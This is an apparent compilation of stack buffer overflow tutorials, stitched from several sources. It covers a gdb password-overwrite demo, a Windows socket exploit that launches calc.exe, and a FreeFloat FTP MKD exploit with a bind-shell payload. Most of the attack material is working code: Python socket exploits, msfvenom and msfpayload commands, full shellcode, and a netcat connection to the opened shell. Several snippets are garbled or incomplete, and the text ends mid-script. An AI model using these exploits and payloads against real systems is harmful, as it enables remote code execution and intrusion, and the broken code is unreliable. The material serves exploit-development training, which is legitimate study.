when they will stop reading from or writing to memory. Microsoft even has a web page
documenting what it calls “banned” functions, which includes these unbounded functions.
Every developer should know these functions and avoid them, and every project should
automatically audit source code for them. These functions all date from a period where
security was not as imperative as it is today. These functions must continue to be supported
because pulling support would break many legacy programs, but they should not be used in
any new programs and should be removed during maintenance of old programs.

Taking a look at the hack

We have looked at the stack, noticed that the buffers are located consecutively in memory,
and talked about why gets is a bad function. Let’s now abuse gets and see whether we can
hack the planet program. Since we know gets has a problem with reading more than it should,
the first thing to try is to give it more data than the buffer can hold. The buffers are 20
characters, so let’s start with 30 characters:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: ddddddddddddddd

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8
(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x00006161

0x7fffffffde00: 0x64646464 0x64646464 0x64646464 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

0x7fffffffde30: 0x00000000 0x00000000 0xffffdf08 0x00007fff

We can see clearly that there are 30 instances of ‘a’ in memory, despite us only specifying
space for 20 characters. We have overflowed the buffer, but not enough to do anything. Let’s
keep trying and try 40 instances of ‘a.’

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

FAILURE!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x64646400 0x00646464

0x7fffffffde10: 0x00000000 0x00007fff 0x00000000 0x00000000

0x7fffffffde20: 0x00400740 0x00000000 0xf7a2d830 0x00007fff

The first thing to notice is that we went far enough to pass through the allotted space
for givenPassword and managed to alter the value of realPassword, which is a huge success.
We did not alter it enough to fool the program, though. Since we are comparing 20 characters
and we wrote eight characters to the realPassword buffer, we need to write 12 more
characters. So, let’s try again, but with 52 instances of ‘a’ this time:

msfuser@ubuntu:~$ gdb example.elf

(gdb) run

Starting program: /home/msfuser/example.elf

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

SUCCESS!

givenPassword: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

realPassword: aaaaaaaaaaaaaaaaaaaa

Program received signal SIGINT, Interrupt.

0x00007ffff7a42428 in __GI_raise (sig=2) at ../sysdeps/unix/sysv/linux/raise.c:54

54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

(gdb) info frame

Stack level 0, frame at 0x7fffffffdde0:

rip = 0x7ffff7a42428 in __GI_raise (../sysdeps/unix/sysv/linux/raise.c:54); saved rip =

0x40072d

called by frame at 0x7fffffffde30

source language c.

Arglist at 0x7fffffffddd0, args: sig=2

Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0

Saved registers:

rip at 0x7fffffffddd8

(gdb) x/200x 0x7fffffffddd0

0x7fffffffddd0: 0x00000000 0x00000000 0x0040072d 0x00000000

0x7fffffffdde0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffddf0: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde00: 0x61616161 0x61616161 0x61616161 0x61616161

0x7fffffffde10: 0x61616161 0x00007f00 0x00000000 0x00000000

Success! We overflowed the buffer for givenPassword and the data went straight
into realPassword, so that we were able to alter the realPassword buffer to whatever we
wanted before the check took place. This is an example of a buffer (or stack) overflow attack.
In this case, we used it to alter variables within a program, but it can also be used to alter
metadata used to track program execution.

https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-
you-need-to-know/

https://owasp.org/www-community/vulnerabilities/Buffer_Overflow

Memory Layout

Credits: GeeksforGeeks

The Stack

Source: Wikipedia

A stack frame is a frame of data that gets pushed onto the stack. In the case of a call stack, a
stack frame would represent a function call and its argument data. The function return address
is pushed onto the stack first, then the arguments and space for local variables.

Registers

• EAX: Accumulator used for performing calculations, and used to store return values
from function calls. Basic operations such as add, subtract, compare use this general-
purpose register
• EBX: Base (does not have anything to do with base pointer). It has no general-purpose
and can be used to store data.

• ECX: Counter used for iterations. ECX counts downward.

• EDX: Data this is an extension of the EAX register. It allows for more complex
calculations (multiply, divide) by allowing extra data to be stored to facilitate those
calculations.

• ESP: Stack pointer

• EBP: Base pointer

• ESI: Source Index holds the location of input data

• EDI: Destination Index points to the location where the result of data operation is
stored

• EIP: Instruction Pointer

How do we Exploit This?

Credits: Acunetix

We can feed any memory address within the stack into the EIP (return address). The program
will execute instructions at that memory address. We can put our shellcode into the stack and
put the address to the start of the shellcode at the EIP, and the program will execute the
shellcode.

The Actual Hack

1. Write past array buffer ending and overwriting EIP register to crash the program.

2. Find the offset of the payload after which the EIP is overwritten.

3. Find and remove bad characters.

4. Find the address of the JMP ESP opcode so that program flow can be redirected to the
stack.
5. Overwrite return address at EIP with the address of JMP ESP.

6. Generate the payload and exploit the program.

Exploiting

Crashing the program

We create a long string using the command python -c "print 'A'*300" and then send it as input
to the server.

Crashed application

We restart the application with Immunity Debugger attached and send the same payload once
more. We can see that the application crashed and the EIP register is overwritten with 41 (A in
hexadecimal).
Finding Offset

Now that we know that we can overwrite the EIP register we need to find out the exact
number of bytes in the payload after which the EIP gets overwritten. To find this we use a tool
called msf-pattern_create to create a unique non-repeating string and send it as a payload.
After the application crashes, we note the value of EIP and use msf-pattern_offset to calculate
the exact value.

Using pattern_create and pattern_offset to find the offset

EIP register overwritten with the payload generated by pattern_create

Finding bad characters

Certain byte characters can cause issues in the development of exploits. By default, the null
byte(x00) is always considered a bad character as it will truncate shellcode when executed. To
find bad characters, we can add a variable of “bad chars” to our code that contains a list of
every single hex character. \x00 and \x0A are NULL and Carriage Return, well known bad
characters so we remove them before testing and add them to our bad characters list. You can
find an easy copy/paste of the variable here):

import sys, socket, time

host = "192.168.0.107"
port = 31337char = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")# EIP Writing Pattern
pattern = "A"*146 + "BBBB" + char + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)# print out what we received
print "Received: {0}".format(data)
client.close() # Close the Connection

After sending this we check the value of the stack (right-click on the ESP register and select
Follow in Dump option).
We can verify that EIP is under our control

The characters that we have sent as input are all present

As all the characters that we have sent are present, we can confirm that there is no bad
character other than \x00 and \x0A. If there was a bad character it would have been replaced
with B0 or the list would have been truncated.
Example of a program with lots of bad characters. Not a part of this exploit.

Finding JMP ESP

Now that we have control over the EIP register we need it to somehow point it to the ESP
register so that it will start executing the contents of the stack. The JMP ESP command does
the same thing. When JMP ESP command is executed it jumps to ESP. We can find out the
location of JMP ESP using the following ways:

1. !mona find -s “\\xff\\xe4”

2. !mona jmp -r esp

In this case, we have two modules which satisfy our requirement. We will use the address
0x080416BF in our exploit. We need to convert this address to little-endian format which is
‘\xBF\x16\x04\x08’ to use it in our code.

Game Over

We generate shellcode using msfvenom and use the generated shellcode in our final exploit.

msfvenom -p windows/exec -b ‘\x00\x0A’ -f python CMD=calc.exe EXITFUNC=thread

The final exploit code

import sys, socket, timehost = "192.168.0.107"

port = 31337#badchar '0x00, 0x0A'
shellcode_calc = ""
shellcode_calc += "\xb8\x3e\x08\xbf\x9c\xdb\xdc\xd9\x74\x24"
shellcode_calc += "\xf4\x5f\x29\xc9\xb1\x31\x31\x47\x13\x03"
shellcode_calc += "\x47\x13\x83\xc7\x3a\xea\x4a\x60\xaa\x68"
shellcode_calc += "\xb4\x99\x2a\x0d\x3c\x7c\x1b\x0d\x5a\xf4"
shellcode_calc += "\x0b\xbd\x28\x58\xa7\x36\x7c\x49\x3c\x3a"
shellcode_calc += "\xa9\x7e\xf5\xf1\x8f\xb1\x06\xa9\xec\xd0"
shellcode_calc += "\x84\xb0\x20\x33\xb5\x7a\x35\x32\xf2\x67"
shellcode_calc += "\xb4\x66\xab\xec\x6b\x97\xd8\xb9\xb7\x1c"
shellcode_calc += "\x92\x2c\xb0\xc1\x62\x4e\x91\x57\xf9\x09"
shellcode_calc += "\x31\x59\x2e\x22\x78\x41\x33\x0f\x32\xfa"
shellcode_calc += "\x87\xfb\xc5\x2a\xd6\x04\x69\x13\xd7\xf6"
shellcode_calc += "\x73\x53\xdf\xe8\x01\xad\x1c\x94\x11\x6a"
shellcode_calc += "\x5f\x42\x97\x69\xc7\x01\x0f\x56\xf6\xc6"
shellcode_calc += "\xd6\x1d\xf4\xa3\x9d\x7a\x18\x35\x71\xf1"
shellcode_calc += "\x24\xbe\x74\xd6\xad\x84\x52\xf2\xf6\x5f"
shellcode_calc += "\xfa\xa3\x52\x31\x03\xb3\x3d\xee\xa1\xbf"
shellcode_calc += "\xd3\xfb\xdb\x9d\xb9\xfa\x6e\x98\x8f\xfd"
shellcode_calc += "\x70\xa3\xbf\x95\x41\x28\x50\xe1\x5d\xfb"
shellcode_calc += "\x15\x0d\xbc\x2e\x63\xa6\x19\xbb\xce\xab"
shellcode_calc += "\x99\x11\x0c\xd2\x19\x90\xec\x21\x01\xd1"
shellcode_calc += "\xe9\x6e\x85\x09\x83\xff\x60\x2e\x30\xff"
shellcode_calc += "\xa0\x4d\xd7\x93\x29\xbc\x72\x14\xcb\xc0"ret = '\xBF\x16\x04\x08' #
Packed in little endian# EIP Writing Pattern
pattern = "A"*146 + ret + "\x90"*16+ shellcode_calc + "\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(pattern)
data = client.recv(1024)print "Received: {0}".format(data)
client.close()
Now we restart the program and run the exploit code. On our windows machine, we see that
calculator application has opened.

References & Resources

1. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-
based-overflows/

2. https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbuf
feroverflowgood_tutorial.md

3. https://www.fuzzysecurity.com/tutorials/expDev/1.html

4. https://www.youtube.com/watch?v=qSnPayW6F7U

5. https://www.geeksforgeeks.org/memory-layout-of-c-program/

6. https://github.com/r4j0x00/oscp-like-stack-buffer-overflow

7. https://www.acunetix.com/blog/web-security-zone/what-is-buffer-overflow/

https://sghosh2402.medium.com/understanding-exploiting-stack-based-buffer-overflows-
acf9b8659cba

This is the first part in a (modest) multi-part exploit development series. This part will just
cover some basic things like what we need to do our work, basic ideas behind exploits and a
couple of things to keep in mind if we want to get to and execute our shellcode. These tutorials
will not cover finding bugs, instead each part will include a vulnerable program which needs a
specific technique to be successfully exploited. In the fullness of time I intend to cover
everything from “Saved Return Pointer Overflows” to “ROP (Return Oriented Programming)”
of course these tutorials won't write themselves so it will take some time to get there. It is
worth mentioning that these tutorials wont cover all the small details and eventualities; this is
done by design to (1) save me some time and (2) allow the diligent reader to learn by
participating.
I would like to give special thanks to Offensive Security and Corelan, thanks for giving me
this amazing and painful addiction!!

(1) What we need

Immunity Debugger - Download

Immunity Debugger is similar to Ollydbg but it has python support which we will need to run
plugin’s to aid us with our exploit development. It’s free; on the link just fill in some bogus info
and hit download.

Mona.py - Download
Mona is an amazing tool with tons of features which will help us to do rapid and reliable
exploit development. I won’t be discussing all the options here, we’ll get to them during the
following parts of the tutorial. Download it and put it in Immunity’s PyCommands folder.

Pvefindaddr.py - Download
Pvefindaddr is Mona’s predecessor. I know it’s a bit outdated but it’s still useful since there are
some features that haven’t been ported to Mona yet. Download it and put it in Immunity’s
PyCommands folder.

Metasploit Framework - Download

We are going to use the Metasploit Framework extensively. Most of all we are going to be
generating shellcode for our exploits but we are also going to need a platform that can receive
any connections we might get back from the programs we are exploiting. I suggest you
use Backtrack since it has everything we need but feel free to set up metasploit in any way you
see fit.

Virtualization Software
Basically there are two options here VirtualBox which is free and Vmware which isn't. If its
possible I would suggest using Vmware; a clever person might not need to pay for it ;)).
Coupled with this we will need several (32-bit) operating systems to develop our exploits on
(you will get the most use out of WindowsXP PRO SP3 and any Windows7).

(2) Overflows

For the purpose of these tutorials I think it’s important to keep things as simple or difficult as
they need to be. In general when we write an exploit we need to find an overflow in a
program. Commonly these bugs will be either Buffer Overflows (a memory location receives
more data than it was meant to) or Stack Overflows (usually a Buffer Overflow that writes
beyond the end of the stack). When such an overflow occurs there are two things we are
looking for; (1) our buffer needs to overwrite EIP (Current Instruction Pointer) and (2) one of
the CPU registers needs to contain our buffer. You can see a list of x86 CPU registers below
with their separate functions. All we need to remember is that any of these registers can store
our buffer (and shellcode).

EAX - Main register used in arithmetic calculations. Also known as accumulator, as it holds
results

of arithmetic operations and function return values.

EBX - The Base Register. Pointer to data in the DS segment. Used to store the base address of
the

program.

ECX - The Counter register is often used to hold a value representing the number of times a
process

is to be repeated. Used for loop and string operations.

EDX - A general purpose registers. Also used for I/O operations. Helps extend EAX to 64-bits.

ESI - Source Index register. Pointer to data in the segment pointed to by the DS register. Used
as

an offset address in string and array operations. It holds the address from where to read
data.

EDI - Destination Index register. Pointer to data (or destination) in the segment pointed to by
the

ES register. Used as an offset address in string and array operations. It holds the implied

write address of all string operations.

EBP - Base Pointer. Pointer to data on the stack (in the SS segment). It points to the bottom of
the

current stack frame. It is used to reference local variables.

ESP - Stack Pointer (in the SS segment). It points to the top of the current stack frame. It is
used

to reference local variables.

EIP - Instruction Pointer (holds the address of the next instruction to be executed)

(3) How does it work?

Basically (1) we get a program to store an overly long string, (2) this string overwrites EIP and
part of it is stored in a CPU register, (3) we find a pointer that points to the register that
contains our buffer, (4) we put that pointer in the correct place in our buffer so it overwrites
EIP, (5) when the program reaches our pointer it executes the instruction and jumps to the
register that contains our buffer and finally (6) we place our shellcode in the part of the buffer
that is stored in the CPU register. In essence we hijack the execution flow and point it to an
area of memory that we control. If we are able to do that we can have to remote machine
execute any instructions we place there. This is a bit simplistic but it should give you a basic
idea of how exploits work.

https://www.fuzzysecurity.com/tutorials/expDev/1.html

Saved Return Pointer Overflows

For our first exploit we will be starting with the most straight forward scenario where we have
a clean EIP overwrite and one of our CPU registers points directly to a large portion of our
buffer. For this part we will be creating an exploit from scratch for ”FreeFloat FTP”. You can
find a list of several exploits that were created for ”FreeFloat FTP” here.

Normally we would need to do badcharacter analysis but for our first tutorial we will rely on
the badcharacters that are listed in the pre-existing metasploit modules on exploit-db. The
characters that are listed are ”\x00\x0A\x0D”. We need to keep these characters in mind for
later.

Exploit Development: Backtrack 5

Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

Replicating The Crash

First of all we need to create a POC skeleton exploit to crash the FTP server. Once we have that
we can build on it to create our exploit. You can see my POC below, I have based it on the
exploits for ”FreeFloat FTP” that I found on exploit-db. We will be using the pre-existing
”anonymous” user account which comes configured with the FTP server (the exploit should
work with any valid login credentials).

#!/usr/bin/python

import socket
import sys

evil = "A"*1000

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.111.128',21))

s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)

s.send('MKD ' + evil + '\r\n')

s.recv(1024)

s.send('QUIT\r\n')

s.close

Ok, so far so good, when we attach the debugger to the FTP server and send our POC buffer
the program crashes. In the screenshot below you can see that EIP is overwritten and that two
registers (ESP and EDI) contain part of our buffer. After analyzing both register dumps ESP
seems more promising since it contains a larger chunk of our buffer (I should mention however
that creating an exploit starting in EDI is certainly possible).

Registers
Overwriting EIP

Next we need to analyze our crash, to do that we need to replace our A's with the metasploit
pattern and resend our buffer. Pay attention that you keep the original buffer length since a
varying buffer length may change the program crash.

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A

d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag
0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah

0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj
7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5

Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0A

o1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar

6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2
Au3Au4Au5Au6Au7Au8Au9Av0Av1

Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4A
x5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A

y7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb
2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc

2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be
7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7

Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

When the program crashes again we see the same thing as in the screenshot above except
that EIP (and both registers) is now overwritten by part of the metasploit pattern. Time to let
“mona” do some of the heavy lifting. If we issue the following command in Immunity debugger
we can have “mona” analyze the program crash. You can see the result of that analysis in the
screenshot below.

!mona findmsp

Metasploit Pattern

From the analysis we can see that EIP is overwritten by the 4-bytes which directly follow after
the initial 247-bytes of our buffer. Like I said before we can also see that ESP contains a larger
chunk of our buffer so it is a more suitable candidate for our exploit. Using this information we
can reorganize the evil buffer in our POC above to look like this:

evil = "A"247 + "B"4 + "C"*749

When we resend our modified buffer we can see that it works exactly as we expected, EIP is
overwritten by our four B's.
EIP = 42424242

That means that we can replace those B's with a pointer that redirects execution flow to ESP.
The only thing we need to keep in mind is that our pointer can't contain any badcharacters. To
find this pointer we can use “mona” with the following command. You can see the results in
the screenshot below.

!mona jmp -r esp

Pointers to ESP
It seems that any of these pointers will do, they belong to OS dll's so they will be specific to
“WinXP PRO SP3” but that’s not our primary concern. We can just use the first pointer in the
list. Keep in mind that we will need to reverse the byte order due to the Little Endian
architecture of the CPU. Observe the syntax below.

Pointer: 0x77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False,

Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5701 (C:\WINDOWS\system32\msvcrt.dll)
Buffer: evil = "A"*247 + "\x59\x54\xC3\x77" + "C"*749

I should stress that it is important to document your exploit properly for your own and others
edification. Our final stage POC should look like this.

#!/usr/bin/python

import socket

import sys

#------------------------------------------------------------

# Badchars: \x00\x0A\x0D

# 0x77c35459 : push esp # ret | msvcrt.dll

#------------------------------------------------------------

evil = "A"247 + "\x59\x54\xC3\x77" + "C"749

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.111.128',21))
s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)

s.send('MKD ' + evil + '\r\n')

s.recv(1024)

s.send('QUIT\r\n')

s.close

Ok lets restart the program in the debugger and put a breakpoint on our pointer so the
debugger pauses if it reaches it. As we can see in the screenshot below EIP is overwritten by
our pointer and we hit our breakpoint which should bring us to our buffer located at ESP.

Breakpoint

Shellcode + Game Over

We are almost done. We need to (1) modify our POC a bit to add a variable for our shellcode
and (2) insert a payload that is to our liking. Lets start with the POC, we will be inserting our
payload in the part of the buffer that is now made up of C's. Ideally we would like to have the
buffer length modified dynamically so we don't need to recalculate if we insert a payload with
a different size (our total buffer length should remain 1000-bytes). We should also insert some
NOP's (No Operation Performed = \x90) before our payload as padding. You can see the result
below. Any shellcode that we insert in the shellcode variable will get executed by our buffer
overflow.

#!/usr/bin/python

import socket

import sys

shellcode = (

#------------------------------------------------------------

# Badchars: \x00\x0A\x0D

# 0x77c35459 : push esp # ret | msvcrt.dll

#------------------------------------------------------------

buffer = "\x90"*20 + shellcode

evil = "A"247 + "\x59\x54\xC3\x77" + buffer + "C"(749-len(buffer))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.111.128',21))

s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)
s.send('MKD ' + evil + '\r\n')

s.recv(1024)

s.send('QUIT\r\n')

s.close

All that remains now is to pop in some shellcode. We will be using msfpayload to generate our
shellcode and pipe the raw output to msfencode to filter out badcharacters.

root@bt:~# msfpayload -l

[...snip...]

windows/shell/reverse_tcp_dns Connect back to the attacker, Spawn a piped command

shell (staged)

windows/shell_bind_tcp Listen for a connection and spawn a command shell

windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a

command shell

[...snip...]

root@bt:~# msfpayload windows/shell_bind_tcp O

Name: Windows Command Shell, Bind TCP Inline

Module: payload/windows/shell_bind_tcp

Version: 8642

Platform: Windows

Arch: x86

Needs Admin: No

Total size: 341

Rank: Normal

Provided by:

vlad902 <[email protected]>

sf <[email protected]>
Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process, none

LPORT 4444 yes The listen port

RHOST no The target address

Description:

Listen for a connection and spawn a command shell

root@bt:~# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D'

-t c

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

unsigned char buf[] =

"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"

"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"

"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"

"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"

"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"

"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"

"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"

"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"

"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"

"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"

"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"

"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"

"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"

"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"

"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"

"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"

"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"

"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"

"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"

"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"

"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"

"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"

"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"

"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92";

After prettifying the code a bit and adding the relevant notes the final exploit is ready.

#!/usr/bin/python

#----------------------------------------------------------------------------------#

# Exploit: FreeFloat FTP (MKD BOF) #

# OS: WinXP PRO SP3 #

# Author: b33f (Ruben Boonen) #

# Software: http://www.freefloat.com/software/freefloatftpserver.zip #

#----------------------------------------------------------------------------------#

# This exploit was created for Part 2 of my Exploit Development tutorial series... #

# http://www.fuzzysecurity.com/tutorials/expDev/2.html #

#----------------------------------------------------------------------------------#

# root@bt:~/Desktop# nc -nv 192.168.111.128 9988 #

# (UNKNOWN) [192.168.111.128] 9988 (?) open #

# Microsoft Windows XP [Version 5.1.2600] #

# (C) Copyright 1985-2001 Microsoft Corp. #

# #

# C:\Documents and Settings\Administrator\Desktop> #

#----------------------------------------------------------------------------------#

import socket

import sys

#----------------------------------------------------------------------------------#

# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c #

